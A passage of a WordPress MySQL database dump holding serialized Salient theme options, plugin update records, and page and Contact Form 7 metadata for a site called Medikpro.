permanent-transparent\";s:1:\"0\";s:24:\"header-inherit-row-color\";s:1:\"0\";s:20:\"header-remove-border\";s:1:\"1\";s:19:\"header-hover-effect\";s:18:\"animated_underline\";s:24:\"header-hide-until-needed\";s:1:\"1\";s:23:\"header-resize-on-scroll\";s:1:\"0\";s:34:\"header-resize-on-scroll-shrink-num\";s:0:\"\";s:21:\"header-dropdown-style\";s:7:\"classic\";s:23:\"header-dropdown-opacity\";s:3:\"100\";s:21:\"header-megamenu-width\";s:9:\"contained\";s:34:\"header-megamenu-remove-transparent\";s:1:\"0\";s:34:\"header-slide-out-widget-area-style\";s:20:\"slide-out-from-right\";s:46:\"header-slide-out-widget-area-dropdown-behavior\";s:7:\"default\";s:28:\"header-slide-out-widget-area\";s:1:\"0\";s:35:\"header-slide-out-widget-area-social\";s:1:\"0\";s:40:\"header-slide-out-widget-area-bottom-text\";s:0:\"\";s:44:\"header-slide-out-widget-area-overlay-opacity\";s:4:\"dark\";s:46:\"header-slide-out-widget-area-top-nav-in-mobile\";s:1:\"0\";s:23:\"enable-main-footer-area\";s:1:\"1\";s:14:\"footer_columns\";s:1:\"4\";s:19:\"footer-custom-color\";s:1:\"1\";s:23:\"footer-background-color\";s:7:\"#ffffff\";s:17:\"footer-font-color\";s:7:\"#898989\";s:27:\"footer-secondary-font-color\";s:7:\"#494949\";s:33:\"footer-copyright-background-color\";s:7:\"#1F1F1F\";s:27:\"footer-copyright-font-color\";s:7:\"#777777\";s:33:\"footer-copyright-icon-hover-color\";s:7:\"#ffffff\";s:21:\"footer-copyright-line\";s:0:\"\";s:17:\"footer-full-width\";s:1:\"0\";s:13:\"footer-reveal\";s:1:\"0\";s:20:\"footer-reveal-shadow\";s:4:\"none\";s:29:\"disable-copyright-footer-area\";s:1:\"1\";s:21:\"footer-copyright-text\";s:0:\"\";s:22:\"disable-auto-copyright\";s:0:\"\";s:23:\"footer-background-image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:31:\"footer-background-image-overlay\";s:3:\"0.8\";s:17:\"use-facebook-icon\";s:1:\"1\";s:16:\"use-twitter-icon\";s:1:\"1\";s:20:\"use-google-plus-icon\";s:1:\"1\";s:14:\"use-vimeo-icon\";s:1:\"1\";s:17:\"use-dribbble-icon\";s:0:\"\";s:18:\"use-pinterest-icon\";s:1:\"1\";s:16:\"use-youtube-icon\";s:1:\"1\";s:15:\"use-tumblr-icon\";s:0:\"\";s:17:\"use-linkedin-icon\";s:0:\"\";s:12:\"use-rss-icon\";s:0:\"\";s:16:\"use-behance-icon\";s:0:\"\";s:18:\"use-instagram-icon\";s:1:\"1\";s:15:\"use-flickr-icon\";s:0:\"\";s:16:\"use-spotify-icon\";s:1:\"1\";s:15:\"use-github-icon\";s:1:\"1\";s:22:\"use-stackexchange-icon\";s:0:\"\";s:19:\"use-soundcloud-icon\";s:1:\"1\";s:11:\"use-vk-icon\";s:0:\"\";s:13:\"use-vine-icon\";s:1:\"1\";s:14:\"use-houzz-icon\";s:1:\"0\";s:13:\"use-yelp-icon\";s:1:\"0\";s:17:\"ajax-page-loading\";s:1:\"1\";s:17:\"transition-method\";s:8:\"standard\";s:32:\"disable-transition-fade-on-click\";s:1:\"0\";s:17:\"transition-effect\";s:18:\"center_mask_reveal\";s:12:\"loading-icon\";s:8:\"material\";s:19:\"loading-icon-colors\";a:2:{s:4:\"from\";s:7:\"#3452ff\";s:2:\"to\";s:7:\"#3452ff\";}s:13:\"loading-image\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:23:\"loading-image-animation\";s:4:\"none\";s:19:\"transition-bg-color\";s:7:\"#2c2f38\";s:21:\"transition-bg-color-2\";s:0:\"\";s:24:\"header-animate-in-effect\";s:8:\"zoom-out\";s:23:\"header-down-arrow-style\";s:7:\"default\";s:10:\"form-style\";s:7:\"minimal\";s:17:\"form-fancy-select\";s:1:\"1\";s:21:\"form-submit-btn-style\";s:7:\"regular\";s:8:\"cta-text\";s:0:\"\";s:7:\"cta-btn\";s:0:\"\";s:12:\"cta-btn-link\";s:0:\"\";s:20:\"cta-background-color\";s:7:\"#ECEBE9\";s:14:\"cta-text-color\";s:7:\"#4B4F52\";s:13:\"cta-btn-color\";s:12:\"accent-color\";s:21:\"main_portfolio_layout\";s:9:\"fullwidth\";s:28:\"main_portfolio_project_style\";s:1:\"6\";s:27:\"main_portfolio_item_spacing\";s:7:\"default\";s:21:\"portfolio_use_masonry\";s:1:\"1\";s:29:\"portfolio_masonry_grid_sizing\";s:7:\"default\";s:24:\"portfolio_inline_filters\";s:1:\"1\";s:20:\"portfolio_single_nav\";s:13:\"after_project\";s:27:\"portfolio_loading_animation\";s:19:\"fade_in_from_bottom\";s:24:\"portfolio_sidebar_follow\";s:1:\"0\";s:16:\"portfolio_social\";s:1:\"1\";s:22:\"portfolio_social_style\";s:7:\"default\";s:26:\"portfolio-facebook-sharing\";s:1:\"1\";s:25:\"portfolio-twitter-sharing\";s:1:\"1\";s:29:\"portfolio-google-plus-sharing\";s:1:\"1\";s:27:\"portfolio-pinterest-sharing\";s:1:\"1\";s:26:\"portfolio-linkedin-sharing\";s:1:\"1\";s:14:\"portfolio_date\";s:1:\"1\";s:20:\"portfolio_pagination\";s:1:\"0\";s:25:\"portfolio_pagination_type\";s:7:\"default\";s:26:\"portfolio_extra_pagination\";s:1:\"0\";s:27:\"portfolio_pagination_number\";s:0:\"\";s:22:\"portfolio_rewrite_slug\";s:0:\"\";s:14:\"carousel-title\";s:0:\"\";s:13:\"carousel-link\";s:0:\"\";s:23:\"portfolio-sortable-text\";s:0:\"\";s:19:\"main-portfolio-link\";s:0:\"\";s:34:\"portfolio_same_category_single_nav\";s:1:\"0\";s:9:\"blog_type\";s:30:\"masonry-blog-full-screen-width\";s:18:\"blog_standard_type\";s:7:\"classic\";s:17:\"blog_masonry_type\";s:16:\"classic_enhanced\";s:25:\"blog_auto_masonry_spacing\";s:3:\"8px\";s:22:\"blog_loading_animation\";s:19:\"fade_in_from_bottom\";s:16:\"blog_header_type\";s:15:\"default_minimal\";s:17:\"blog_hide_sidebar\";s:1:\"1\";s:14:\"blog_enable_ss\";s:1:\"0\";s:24:\"blog_hide_featured_image\";s:1:\"1\";s:21:\"blog_archive_bg_image\";a:5:{s:3:\"url\";s:90:\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2015/12/blog-header-1.jpg\";s:2:\"id\";s:4:\"6227\";s:6:\"height\";s:3:\"529\";s:5:\"width\";s:4:\"1734\";s:9:\"thumbnail\";s:98:\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2015/12/blog-header-1-150x150.jpg\";}s:10:\"author_bio\";s:1:\"0\";s:17:\"blog_auto_excerpt\";s:1:\"1\";s:19:\"blog_excerpt_length\";s:0:\"\";s:19:\"blog_next_post_link\";s:1:\"1\";s:25:\"blog_next_post_link_style\";s:19:\"fullwidth_next_only\";s:18:\"blog_related_posts\";s:1:\"0\";s:24:\"blog_related_posts_style\";s:8:\"material\";s:29:\"blog_related_posts_title_text\";s:13:\"related_posts\";s:11:\"blog_social\";s:1:\"1\";s:17:\"blog_social_style\";s:7:\"default\";s:21:\"blog-facebook-sharing\";s:1:\"1\";s:20:\"blog-twitter-sharing\";s:1:\"1\";s:24:\"blog-google-plus-sharing\";s:1:\"1\";s:22:\"blog-pinterest-sharing\";s:1:\"1\";s:21:\"blog-linkedin-sharing\";s:1:\"1\";s:12:\"display_tags\";s:1:\"0\";s:17:\"display_full_date\";s:1:\"0\";s:20:\"blog_pagination_type\";s:7:\"default\";s:16:\"extra_pagination\";s:1:\"0\";s:18:\"recent-posts-title\";s:0:\"\";s:17:\"recent-posts-link\";s:0:\"\";s:10:\"zoom-level\";s:0:\"\";s:15:\"enable-map-zoom\";s:1:\"0\";s:10:\"center-lat\";s:0:\"\";s:10:\"center-lng\";s:0:\"\";s:14:\"use-marker-img\";s:1:\"0\";s:10:\"marker-img\";a:5:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:6:\"height\";s:0:\"\";s:5:\"width\";s:0:\"\";s:9:\"thumbnail\";s:0:\"\";}s:20:\"enable-map-animation\";s:1:\"1\";s:11:\"map-point-1\";s:1:\"0\";s:9:\"latitude1\";s:0:\"\";s:10:\"longitude1\";s:0:\"\";s:9:\"map-info1\";s:0:\"\";s:11:\"map-point-2\";s:1:\"0\";s:9:\"latitude2\";s:0:\"\";s:10:\"longitude2\";s:0:\"\";s:9:\"map-info2\";s:0:\"\";s:11:\"map-point-3\";s:1:\"0\";s:9:\"latitude3\";s:0:\"\";s:10:\"longitude3\";s:0:\"\";s:9:\"map-info3\";s:0:\"\";s:11:\"map-point-4\";s:1:\"0\";s:9:\"latitude4\";s:0:\"\";s:10:\"longitude4\";s:0:\"\";s:9:\"map-info4\";s:0:\"\";s:11:\"map-point-5\";s:1:\"0\";s:9:\"latitude5\";s:0:\"\";s:10:\"longitude5\";s:0:\"\";s:9:\"map-info5\";s:0:\"\";s:11:\"map-point-6\";s:1:\"0\";s:9:\"latitude6\";s:0:\"\";s:10:\"longitude6\";s:0:\"\";s:9:\"map-info6\";s:0:\"\";s:11:\"map-point-7\";s:1:\"0\";s:9:\"latitude7\";s:0:\"\";s:10:\"longitude7\";s:0:\"\";s:9:\"map-info7\";s:0:\"\";s:11:\"map-point-8\";s:1:\"0\";s:9:\"latitude8\";s:0:\"\";s:10:\"longitude8\";s:0:\"\";s:9:\"map-info8\";s:0:\"\";s:11:\"map-point-9\";s:1:\"0\";s:9:\"latitude9\";s:0:\"\";s:10:\"longitude9\";s:0:\"\";s:9:\"map-info9\";s:0:\"\";s:12:\"map-point-10\";s:1:\"0\";s:10:\"latitude10\";s:0:\"\";s:11:\"longitude10\";s:0:\"\";s:10:\"map-info10\";s:0:\"\";s:20:\"add-remove-locations\";s:0:\"\";s:13:\"map-greyscale\";s:1:\"0\";s:9:\"map-color\";s:0:\"\";s:14:\"map-ultra-flat\";s:0:\"\";s:21:\"map-dark-color-scheme\";s:0:\"\";s:24:\"slider-caption-animation\";s:1:\"1\";s:23:\"slider-background-cover\";s:1:\"1\";s:15:\"slider-autoplay\";s:1:\"1\";s:20:\"slider-advance-speed\";s:0:\"\";s:22:\"slider-animation-speed\";s:0:\"\";s:13:\"slider-height\";s:0:\"\";s:15:\"slider-bg-color\";s:7:\"#000000\";s:24:\"sharing_btn_accent_color\";s:1:\"1\";s:12:\"facebook-url\";s:0:\"\";s:11:\"twitter-url\";s:0:\"\";s:15:\"google-plus-url\";s:0:\"\";s:9:\"vimeo-url\";s:0:\"\";s:12:\"dribbble-url\";s:0:\"\";s:13:\"pinterest-url\";s:0:\"\";s:11:\"youtube-url\";s:0:\"\";s:10:\"tumblr-url\";s:0:\"\";s:12:\"linkedin-url\";s:0:\"\";s:7:\"rss-url\";s:0:\"\";s:11:\"behance-url\";s:0:\"\";s:10:\"flickr-url\";s:0:\"\";s:11:\"spotify-url\";s:0:\"\";s:13:\"instagram-url\";s:0:\"\";s:10:\"github-url\";s:0:\"\";s:17:\"stackexchange-url\";s:0:\"\";s:14:\"soundcloud-url\";s:0:\"\";s:6:\"vk-url\";s:0:\"\";s:8:\"vine-url\";s:0:\"\";s:9:\"houzz-url\";s:0:\"\";s:8:\"yelp-url\";s:0:\"\";s:9:\"email-url\";s:0:\"\";s:9:\"phone-url\";s:0:\"\";}','yes'),(148,'salient_redux-transients','a:2:{s:14:\"changed_values\";a:1:{s:21:\"header-starting-color\";s:7:\"#ffffff\";}s:9:\"last_save\";i:1517273929;}','yes'),(156,'wpcf7','a:2:{s:7:\"version\";s:5:\"4.9.2\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1512846549;s:7:\"version\";s:5:\"4.9.2\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(157,'recently_activated','a:0:{}','yes'),(158,'vc_version','5.2.4','yes'),(178,'wbc_import_progress','a:3:{s:10:\"total_post\";i:36;s:14:\"imported_count\";i:36;s:9:\"remaining\";i:0;}','yes'),(180,'slider-locations_children','a:0:{}','yes'),(181,'project-type_children','a:0:{}','yes'),(182,'project-attributes_children','a:0:{}','yes'),(183,'wbc_imported_demos','a:1:{s:13:\"wbc-import-10\";a:5:{s:9:\"directory\";s:9:\"Corporate\";s:12:\"content_file\";s:11:\"content.xml\";s:5:\"image\";s:16:\"screen-image.jpg\";s:13:\"theme_options\";s:17:\"theme-options.txt\";s:8:\"imported\";s:8:\"imported\";}}','yes'),(185,'widget_recent-posts-extra','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(186,'widget_recent-projects','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(191,'WPLANG','','yes'),(192,'new_admin_email','donny@futuremediatrix.com','yes'),(195,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(204,'duplicate_post_copytitle','1','yes'),(205,'duplicate_post_copydate','0','yes'),(206,'duplicate_post_copystatus','0','yes'),(207,'duplicate_post_copyslug','1','yes'),(208,'duplicate_post_copyexcerpt','1','yes'),(209,'duplicate_post_copycontent','1','yes'),(210,'duplicate_post_copythumbnail','1','yes'),(211,'duplicate_post_copytemplate','1','yes'),(212,'duplicate_post_copyformat','1','yes'),(213,'duplicate_post_copyauthor','0','yes'),(214,'duplicate_post_copypassword','0','yes'),(215,'duplicate_post_copyattachments','0','yes'),(216,'duplicate_post_copychildren','0','yes'),(217,'duplicate_post_copycomments','0','yes'),(218,'duplicate_post_copymenuorder','1','yes'),(219,'duplicate_post_taxonomies_blacklist','a:0:{}','yes'),(220,'duplicate_post_blacklist','','yes'),(221,'duplicate_post_types_enabled','a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}','yes'),(222,'duplicate_post_show_row','1','yes'),(223,'duplicate_post_show_adminbar','1','yes'),(224,'duplicate_post_show_submitbox','1','yes'),(225,'duplicate_post_show_bulkactions','1','yes'),(226,'duplicate_post_version','3.2.1','yes'),(227,'duplicate_post_show_notice','0','no'),(275,'taxonomy_2','a:2:{s:14:\"category_image\";s:0:\"\";s:14:\"category_color\";s:0:\"\";}','yes'),(276,'category_children','a:0:{}','yes'),(277,'taxonomy_3','a:2:{s:14:\"category_image\";s:0:\"\";s:14:\"category_color\";s:0:\"\";}','yes'),(531,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:25:\"donny@futuremediatrix.com\";s:7:\"version\";s:5:\"4.9.8\";s:9:\"timestamp\";i:1533575932;}','no'),(1038,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.8.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.8.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.9.8-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.8-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.8\";s:7:\"version\";s:5:\"4.9.8\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1541841331;s:15:\"version_checked\";s:5:\"4.9.8\";s:12:\"translations\";a:0:{}}','no'),(1199,'_site_transient_timeout_theme_roots','1541843131','no'),(1200,'_site_transient_theme_roots','a:5:{s:13:\"salient-child\";s:7:\"/themes\";s:7:\"salient\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";}','no'),(1201,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1541841332;s:7:\"checked\";a:5:{s:13:\"salient-child\";s:3:\"0.1\";s:7:\"salient\";s:5:\"8.5.3\";s:13:\"twentyfifteen\";s:3:\"1.9\";s:15:\"twentyseventeen\";s:3:\"1.4\";s:13:\"twentysixteen\";s:3:\"1.4\";}s:8:\"response\";a:3:{s:13:\"twentyfifteen\";a:4:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"2.0\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.2.0.zip\";}s:15:\"twentyseventeen\";a:4:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.1.7.zip\";}s:13:\"twentysixteen\";a:4:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"1.5\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.1.5.zip\";}}s:12:\"translations\";a:0:{}}','no'),(1202,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1541841332;s:7:\"checked\";a:5:{s:19:\"akismet/akismet.php\";s:5:\"4.0.1\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:5:\"4.9.2\";s:33:\"duplicate-post/duplicate-post.php\";s:5:\"3.2.1\";s:9:\"hello.php\";s:3:\"1.6\";s:35:\"js_composer_salient/js_composer.php\";s:5:\"5.2.4\";}s:8:\"response\";a:3:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.0.8\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.0.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.0\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.0.5\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.0.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=984007\";s:2:\"1x\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-128x128.png?rev=984007\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.8\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:33:\"duplicate-post/duplicate-post.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/duplicate-post\";s:4:\"slug\";s:14:\"duplicate-post\";s:6:\"plugin\";s:33:\"duplicate-post/duplicate-post.php\";s:11:\"new_version\";s:5:\"3.2.2\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/duplicate-post/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/duplicate-post.3.2.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/duplicate-post/assets/icon-256x256.png?rev=1612753\";s:2:\"1x\";s:67:\"https://ps.w.org/duplicate-post/assets/icon-128x128.png?rev=1612753\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/duplicate-post/assets/banner-772x250.png?rev=1612986\";}s:11:\"banners_rtl\";a:0:{}s:14:\"upgrade_notice\";s:90:\"<p>Adds compatibility with Gutenberg UI and fixes a problem with slugs on new installs</p>\";s:6:\"tested\";s:5:\"4.9.5\";s:12:\"requires_php\";s:5:\"5.2.4\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:1:{s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/hello-dolly.1.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";s:2:\"1x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=969907\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";}s:11:\"banners_rtl\";a:0:{}}}}','no');
/*!40000 ALTER TABLE `wm_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_postmeta`
--

DROP TABLE IF EXISTS `wm_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=7777 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_postmeta`
--

LOCK TABLES `wm_postmeta` WRITE;
/*!40000 ALTER TABLE `wm_postmeta` DISABLE KEYS */;
INSERT INTO `wm_postmeta` VALUES (1,2,'_wp_page_template','default'),(6,6,'_form','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]'),(7,6,'_mail','a:8:{s:7:\"subject\";s:25:\"Medikpro \"[your-subject]\"\";s:6:\"sender\";s:51:\"[your-name] <wordpress@sandbox.futuremediatrix.com>\";s:4:\"body\";s:190:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Medikpro (http://sandbox.futuremediatrix.com/medikpro)\";s:9:\"recipient\";s:25:\"donny@futuremediatrix.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(8,6,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:25:\"Medikpro \"[your-subject]\"\";s:6:\"sender\";s:48:\"Medikpro <wordpress@sandbox.futuremediatrix.com>\";s:4:\"body\";s:132:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Medikpro (http://sandbox.futuremediatrix.com/medikpro)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:35:\"Reply-To: donny@futuremediatrix.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(9,6,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";}'),(10,6,'_additional_settings',NULL),(11,6,'_locale','en_US'),(13,5,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(15,5,'_wp_page_template','default'),(16,5,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(17,5,'nectar-metabox-portfolio-display-sortable','off'),(18,5,'_nectar_slider_bg_type','image_bg'),(19,5,'_nectar_canvas_shapes',''),(20,5,'_nectar_media_upload_webm',''),(21,5,'_nectar_media_upload_mp4',''),(22,5,'_nectar_media_upload_ogv',''),(23,5,'_nectar_slider_preview_image',''),(24,5,'_nectar_header_bg',''),(25,5,'_nectar_header_parallax','off'),(26,5,'_nectar_header_box_roll','off'),(27,5,'_nectar_header_bg_height',''),(28,5,'_nectar_header_fullscreen','off'),(29,5,'_nectar_header_title',''),(30,5,'_nectar_header_subtitle',''),(31,5,'_nectar_page_header_text-effect','none'),(32,5,'_nectar_particle_rotation_timing',''),(33,5,'_nectar_particle_disable_explosion','off'),(34,5,'_nectar_page_header_alignment','left'),(35,5,'_nectar_page_header_alignment_v','middle'),(36,5,'_nectar_page_header_bg_alignment','center'),(37,5,'_nectar_header_bg_color',''),(38,5,'_nectar_header_font_color',''),(39,5,'_wpb_vc_js_status','true'),(40,5,'_disable_transparent_header','off'),(41,5,'_force_transparent_header','on'),(42,5,'_post_restored_from','a:3:{s:20:\"restored_revision_id\";i:5888;s:16:\"restored_by_user\";i:1;s:13:\"restored_time\";i:1451673200;}'),(43,19,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(44,19,'_wpb_shortcodes_custom_css','.vc_custom_1516234892568{padding-right: 10% !important;}'),(45,19,'_wp_page_template','default'),(46,19,'_wpb_vc_js_status','true'),(47,19,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(48,19,'nectar-metabox-portfolio-display-sortable','off'),(49,19,'_nectar_slider_bg_type','image_bg'),(50,19,'_nectar_canvas_shapes',''),(51,19,'_nectar_media_upload_webm',''),(52,19,'_nectar_media_upload_mp4',''),(53,19,'_nectar_media_upload_ogv',''),(54,19,'_nectar_slider_preview_image',''),(55,19,'_nectar_header_bg',''),(56,19,'_nectar_header_parallax','on'),(57,19,'_nectar_header_box_roll','off'),(58,19,'_nectar_header_bg_height','600'),(59,19,'_nectar_header_fullscreen','on'),(60,19,'_nectar_header_title','About Us'),(61,19,'_nectar_header_subtitle','Text here'),(62,19,'_nectar_page_header_text-effect','none'),(63,19,'_nectar_particle_rotation_timing',''),(64,19,'_nectar_particle_disable_explosion','off'),(65,19,'_nectar_page_header_alignment','center'),(66,19,'_nectar_page_header_alignment_v','middle'),(67,19,'_nectar_page_header_bg_alignment','center'),(68,19,'_nectar_header_bg_color','#1e1e1e'),(69,19,'_nectar_header_font_color',''),(70,19,'_disable_transparent_header','off'),(71,19,'_force_transparent_header','on'),(72,21,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(73,21,'_wp_page_template','default'),(74,21,'_wpb_vc_js_status','true'),(75,21,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(76,21,'nectar-metabox-portfolio-display-sortable','off'),(77,21,'_nectar_slider_bg_type','image_bg'),(78,21,'_nectar_canvas_shapes',''),(79,21,'_nectar_media_upload_webm',''),(80,21,'_nectar_media_upload_mp4',''),(81,21,'_nectar_media_upload_ogv',''),(82,21,'_nectar_slider_preview_image',''),(83,21,'_nectar_header_bg',''),(84,21,'_nectar_header_parallax','off'),(85,21,'_nectar_header_box_roll','off'),(86,21,'_nectar_header_bg_height',''),(87,21,'_nectar_header_fullscreen','off'),(88,21,'_nectar_header_title',''),(89,21,'_nectar_header_subtitle',''),(90,21,'_nectar_page_header_text-effect','none'),(91,21,'_nectar_particle_rotation_timing',''),(92,21,'_nectar_particle_disable_explosion','off'),(93,21,'_nectar_page_header_alignment','left'),(94,21,'_nectar_page_header_alignment_v','middle'),(95,21,'_nectar_page_header_bg_alignment','center'),(96,21,'_nectar_header_bg_color',''),(97,21,'_nectar_header_font_color',''),(98,21,'_disable_transparent_header','off'),(99,21,'_force_transparent_header','on'),(100,25,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(101,25,'_wp_page_template','default'),(102,25,'_wpb_vc_js_status','true'),(103,25,'nectar-metabox-